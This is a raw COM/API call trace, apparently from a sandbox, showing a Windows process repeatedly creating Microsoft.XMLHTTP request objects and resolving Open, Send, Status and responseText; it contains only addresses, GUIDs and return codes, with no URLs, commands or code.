	[0921.976] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0921.976] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0921.976] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0922.744] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0922.744] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0922.744] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0922.744] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0922.745] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0922.745] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0929.904] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0929.904] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0929.904] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0929.905] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0929.905] SysStringLen (param_1=0x0) returned 0x0
	[0929.905] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0929.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0929.906] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0929.906] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0929.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0929.906] ??2@YAPEAX_K@Z () returned 0x62f310
	[0929.906] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0929.906] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0929.906] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0929.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0929.906] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0929.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0929.907] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0929.909] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0929.909] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0929.909] SysStringLen (param_1=0x0) returned 0x0
	[0929.910] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0929.910] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0929.910] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7250) returned 0x0
	[0929.910] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0929.910] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0929.910] ??2@YAPEAX_K@Z () returned 0x62f330
	[0929.910] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0929.910] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0929.910] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0929.910] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7250) returned 0x0
	[0929.910] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7250) returned 0x3
	[0929.910] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0929.911] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7250, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0929.911] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0929.911] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0929.911] SysStringLen (param_1=0x0) returned 0x0
	[0929.911] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0929.911] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0929.911] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0929.911] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0929.911] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0929.911] ??2@YAPEAX_K@Z () returned 0x62f310
	[0929.912] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0929.912] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0929.912] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0929.912] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0929.912] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0929.912] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0929.912] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0929.912] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0929.912] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0929.912] SysStringLen (param_1=0x0) returned 0x0
	[0929.912] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0929.913] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0929.913] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7330) returned 0x0
	[0929.913] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0929.913] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0929.913] ??2@YAPEAX_K@Z () returned 0x62f330
	[0929.913] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0929.913] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0929.913] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0929.913] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7330) returned 0x0
	[0929.913] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7330) returned 0x3
	[0929.913] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0929.913] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7330, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0929.914] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0929.914] longjmp () 
	[0929.914] longjmp () 
	[0929.914] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0929.914] SysStringLen (param_1=0x0) returned 0x0
	[0929.914] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0929.914] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0929.914] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0929.914] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0929.914] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7268) returned 0x0
	[0929.915] ??2@YAPEAX_K@Z () returned 0x62f310
	[0929.916] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7268, pUnkSite=0x62f310) 
	[0929.917] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0929.917] XMLHTTPRequest:IUnknown:Release (This=0x49c7268) returned 0x0
	[0929.917] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0929.917] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0929.917] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0929.917] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0929.917] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0929.917] longjmp () 
	[0929.918] longjmp () 
	[0929.918] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0929.918] SysStringLen (param_1=0x0) returned 0x0
	[0929.918] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
